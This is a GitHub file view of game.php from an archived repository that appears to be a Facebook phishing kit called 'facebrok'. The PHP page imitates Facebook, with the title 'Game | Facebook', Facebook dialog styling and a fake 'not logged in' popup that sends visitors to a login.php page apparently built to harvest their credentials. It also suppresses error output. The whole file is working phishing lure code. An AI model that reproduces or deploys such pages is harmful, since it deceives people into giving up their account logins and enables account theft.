This repository has been archived by the owner on Nov 7, 2021. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 39
/
game.php
28 lines (24 loc) · 1.57 KB
/
game.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
include 'croak/core.function.php';
$facebrok = new facebrok();
$facebrok->error_disable();
include("includes/top_3.php");
?>
<style>
* {
margin: 0; padding: 0;
}
html {
background: url(dynamic/play_this_game.png) no-repeat center center fixed;
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
}
</style>
<title>Game | Facebook</title>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="dynamic/índice.ico" />
<body bgcolor="#FFFFFF" topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" scroll="no">
<a href="login.php?login_attempt=1&lwv=1">
<div class="generic_dialog pop_dialog generic_dialog_modal" id="dialog_1"><div class="generic_dialog_popup" style="margin-top: 125px;"><div class="pop_container_advanced"><div class="pop_content" id="pop_content" tabindex="0" role="alertdialog"><h2 class="dialog_title" id="title_dialog_1"><span><?php echo $facebrok->translater("not_logged"); ?></span></h2><div class="dialog_content"><div class="dialog_summary hidden_elem"></div><div class="dialog_body"><?php echo $facebrok->translater("pls_not_logged"); ?></div><div class="dialog_buttons clearfix"><div class="rfloat mlm"><label class="uiButton uiButtonLarge uiButtonConfirm"><input type="button" name="#" <a="" value="<?php echo $facebrok->translater("log_in"); ?>"></label></div><div class="dialog_buttons_msg"></div></div><div class="dialog_footer hidden_elem"></div></div></div></div></div></div></a></body>